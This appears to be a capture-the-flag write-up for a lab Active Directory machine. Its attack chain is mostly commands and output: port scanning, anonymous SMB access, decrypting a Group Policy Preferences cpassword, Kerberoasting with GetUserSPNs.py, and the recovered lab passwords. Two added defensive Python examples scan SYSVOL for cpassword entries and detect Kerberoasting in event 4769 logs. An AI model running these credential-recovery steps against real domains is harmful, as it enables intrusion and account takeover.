53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49170,49172
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-07 06:08:08Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49172/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows Vista or Windows 7 SP1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   210:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-01-07T06:09:07
|_  start_date: 2024-01-07T05:56:40
|_clock-skew: -19s
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Replication     Disk
	SYSVOL          Disk      Logon server share
	Users           Disk
SMB1 disabled -- no workgroup available
smbclient //10.129.183.151/Replication -N
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
active.htb\SVC_TGS edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
active.htb\SVC_TGS:GPPstillStandingStrong2k18
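The cpassword in that Groups.xml is the classic Group Policy Preferences exposure (MS14-025): the AES key is published by Microsoft, so anyone who can read SYSVOL can recover the plaintext, which is why the value decrypts so easily. From the defender's side the first check is simply to find every preference file in SYSVOL that still carries a cpassword attribute. The scanner below is an added example written for these notes, not code from the writeup or from any tool it uses; the XML documents it runs over are constructed, the account names in them are made up, and the cpassword values are placeholders rather than real ciphertext.

```python
"""Find cpassword attributes in Group Policy Preferences XML (MS14-025 exposure).

Added example: the sample documents below are constructed and the cpassword
values are placeholders, not real GPP ciphertext.
"""
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List

# Preference files whose client-side extensions accepted a stored password.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}

# Attributes that name the account the stored password belongs to (varies by file type).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpassword(xml_text: str, source: str = "<inline>") -> List[Dict[str, str]]:
    """Return one finding per element that carries a non-empty cpassword attribute."""
    findings: List[Dict[str, str]] = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # A preference file that does not parse is worth a manual look, so report it too.
        return [{"source": source, "element": "?", "account": "?",
                 "note": f"parse error: {exc}"}]
    for elem in root.iter():
        cpw = elem.attrib.get("cpassword", "")
        if not cpw:
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "?")
        findings.append({"source": source, "element": elem.tag, "account": account,
                         "note": f"cpassword present ({len(cpw)} chars); treat the password as disclosed"})
    return findings


def scan_sysvol(sysvol_root: str) -> List[Dict[str, str]]:
    """Walk a SYSVOL copy (e.g. the share mounted read-only) and scan every GPP file."""
    results: List[Dict[str, str]] = []
    for path in Path(sysvol_root).rglob("*.xml"):
        if path.name in GPP_FILES:
            # Windows writes these files with a UTF-8 BOM; utf-8-sig accepts either form.
            results.extend(find_cpassword(path.read_text(encoding="utf-8-sig"), str(path)))
    return results


# Constructed samples (not real policy files). CLSIDs are Microsoft's Groups.xml ones.
SAMPLE_GROUPS = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="corp.example\\svc_backup" image="2">
    <Properties action="U" cpassword="PLACEHOLDER_CIPHERTEXT_NOT_REAL==" userName="corp.example\\svc_backup"/>
  </User>
</Groups>
"""

SAMPLE_TASKS = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <Task name="nightly-copy">
    <Properties action="C" runAs="corp.example\\svc_task" cpassword="PLACEHOLDER_CIPHERTEXT_NOT_REAL==" />
  </Task>
</ScheduledTasks>
"""

SAMPLE_CLEAN = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="corp.example\\svc_backup" image="2">
    <Properties action="U" description="rotated out of GPP" userName="corp.example\\svc_backup"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for name, doc in (("Groups.xml", SAMPLE_GROUPS), ("ScheduledTasks.xml", SAMPLE_TASKS),
                      ("Groups-clean.xml", SAMPLE_CLEAN)):
        for f in find_cpassword(doc, name):
            print(f"{f['source']}: <{f['element']}> account={f['account']}: {f['note']}")
```

Run it against a read-only copy of SYSVOL with scan_sysvol; any hit means the password must be rotated and the preference item removed, since the patched client only stops creating new cpassword entries and leaves existing ones in place.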
smbclient //10.129.183.151/Users -U SVC_TGS
Retrieve user.txt from the Users share.
bloodhound-python --dns-tcp -c All -u SVC_TGS -p 'GPPstillStandingStrong2k18' -d active.htb -dc active.htb -ns 10.129.183.151 --zip
Next, try Kerberoasting: request service tickets for accounts that have an SPN set.
GetUserSPNs.py -request -dc-ip 10.129.183.151 active.htb/svc_tgs
This returns the service ticket hash for the Administrator account, which has an SPN:
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$68b59e5c6b9eed7f8acf9e7909277546$4f2246ba749004258f251c0951bc107389267dc38a95f5c38a799012cccbf84734eaf300d95a94e0d6ff34f8c19a0b188d45ac08458b14404246b387bf56d7104bc8e2de1ccf874dc5e10fc79d5d0e15a2af94d3536e406db95641c89b8af4c2243d51d8b01611205f8d2caae5ac34be1d0ed73d16ab64193590d7829474ade852140a9f41c97e08798d5c0d500cec6933581dd5fabc74f243c0d8234c31e3d108f402ba1fbbc38712e23714af479721fa7d35bd66f5ecbe8a4cac6c8368edc1413bfad64f3167040d52a529c07e3d91aa4108f94b2bed83c548da49ec23ab55b9c305aa82f480a614308d4a5879c59e9003b2fdc9255d279b25ff9f4841f68f52af38df5ca832ba28434fb0506082c0ea2fbc7fe6265f50711cecd8988171e57a261803d0c106f4d87ff873d9c8e086ebd3726e1ee70fd71c6872ef1a990404724cd21ac5c6055f9ea973326d513ce36c080935a12e77f87268e569386d09bbe09d8e7cb5b8eeeb25d04cd1301321274942f300bb42eafe68ce0d72fe95e2d291b38d2203d477c7a08cb5f8c830d70e0ff0c769dc4a8158124492334fc2502876e480d939c92bee882a6eb5c5b5bd5a4a691a66b4996963877441893b1adf008ccf1dd77a9bb1f68714df1f3f30804778888d2281e02bff861a1760f7e5b4c3d27eaf5fd59726c3af41323a3550802df45eb93fe8cd17c78463ca2ff24c506a5883b5bf677e12eb9945a9133f82701b552d96a311520867c2744ebebf43ce2d2dbc0e077a0a936a8fbfe82a8038169c0f8db6fe92bd40980d97a27ab92a170cea8c3093d85343b071f07adcd24ecb2f4133454e96d5ce7a4a1cff881aefb65b37d7c121798de9eb93112e2cdfeaf1f96d11b51b2641f8527fe6757d58033b17a702d921926c13ce3a90576fc3537fdfd1cf85999b3a5fbe38454606ef28fd14c82cb2d211256f0117e02ebab5ae672a8d83bf39c6666d33fa5b1980b7b690c7edf04a1ab4b94a14bde3cbcc730853aabe09ac088fb105818570a0602daaebde134031129b59542abb8061d2b3b25396920d4c2db835b43e3d14b098ffceec3c16bccfa6f7b5ceaaa99dd6bb2417a95fe34fea5318136491aaabb3ebbd431b486e55fbb942f8f04e3fceceeb05054bc6f5dcffc50efa90910864d7621af8f864318dffe2ca544040bbf5937e9346a2fc972be8d00618401ecc6bc1c4366a19ee3d8ad890431326592190b245a0534d653905629127358444e85c
Administrator:Ticketmaster1968
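The hash above starts with `$krb5tgs$23$`, i.e. a service ticket encrypted with RC4-HMAC (etype 23), and that weak encryption type is what makes offline cracking of the account's password practical. On the domain controller the request is recorded as Security event 4769 (the "Audit Kerberos Service Ticket Operations" subcategory must be enabled): a ticket for a user account's SPN with TicketEncryptionType 0x17, or one principal requesting tickets for many SPNs in a short window, are the two usual signals. The detector below is an added example written for these notes, not code from the writeup or from any tool it uses; the 4769 records it runs over are constructed and flattened to key=value lines, and every name and address in them is made up.

```python
"""Flag Kerberoasting patterns in Security event 4769 records.

Added example: the log lines below are constructed, flattened 4769/4768 events,
not real audit data.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

SAMPLE_LOG = """\
2024-01-07T06:10:01Z EventID=4769 TargetUserName=svc_tgs@CORP.EXAMPLE ServiceName=WS01$ TicketEncryptionType=0x12 IpAddress=10.0.0.20 Status=0x0
2024-01-07T06:10:02Z EventID=4769 TargetUserName=svc_tgs@CORP.EXAMPLE ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=10.0.0.20 Status=0x0
2024-01-07T06:10:02Z EventID=4769 TargetUserName=svc_tgs@CORP.EXAMPLE ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.20 Status=0x0
2024-01-07T06:10:03Z EventID=4769 TargetUserName=svc_tgs@CORP.EXAMPLE ServiceName=svc_http TicketEncryptionType=0x17 IpAddress=10.0.0.20 Status=0x0
2024-01-07T06:10:03Z EventID=4769 TargetUserName=svc_tgs@CORP.EXAMPLE ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.0.0.20 Status=0x0
2024-01-07T06:11:15Z EventID=4769 TargetUserName=alice@CORP.EXAMPLE ServiceName=FS01$ TicketEncryptionType=0x12 IpAddress=10.0.0.31 Status=0x0
2024-01-07T06:12:40Z EventID=4769 TargetUserName=bob@CORP.EXAMPLE ServiceName=svc_sql TicketEncryptionType=0x12 IpAddress=10.0.0.32 Status=0x0
2024-01-07T06:12:41Z EventID=4768 TargetUserName=bob@CORP.EXAMPLE ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.0.0.32 Status=0x0
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kv>.*)$")
RC4_HMAC = "0x17"  # etype 23, the "$krb5tgs$23$" format seen above


def parse_events(text: str) -> List[Dict[str, object]]:
    """Turn the flattened key=value lines into event dicts with a parsed timestamp."""
    events: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev: Dict[str, object] = dict(tok.split("=", 1) for tok in m.group("kv").split())
        ev["ts"] = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def is_user_spn(service: str) -> bool:
    """Machine accounts end in '$' and krbtgt tickets are TGTs; neither is a roastable SPN."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoast(events: List[Dict[str, object]], min_services: int = 3,
                      window: timedelta = timedelta(minutes=5)) -> List[Dict[str, object]]:
    """Two rules: any RC4 service ticket for a user SPN, and one requester sweeping many SPNs."""
    findings: List[Dict[str, object]] = []
    per_user: Dict[str, list] = defaultdict(list)
    for ev in events:
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue  # only successful service ticket requests matter here
        svc = str(ev["ServiceName"])
        if not is_user_spn(svc):
            continue
        user = str(ev["TargetUserName"])
        if ev.get("TicketEncryptionType") == RC4_HMAC:
            findings.append({"rule": "rc4_service_ticket", "user": user,
                             "service": svc, "ts": ev["ts"]})
        per_user[user].append((ev["ts"], svc))
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                findings.append({"rule": "spn_sweep", "user": user,
                                 "services": sorted(services), "ts": t0})
                break  # one sweep finding per requester is enough
    return findings


if __name__ == "__main__":
    for f in detect_kerberoast(parse_events(SAMPLE_LOG)):
        print(f)
```

The RC4 rule only stays quiet in a domain where service accounts advertise AES in msDS-SupportedEncryptionTypes, which is also the mitigation: with AES-only tickets the sweep rule carries the signal, and long random passwords (or gMSAs) make whatever is captured uncrackable.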
smbmap -H 10.129.183.151 -u Administrator -p 'Ticketmaster1968'
Then connect with smbclient as Administrator and retrieve the file.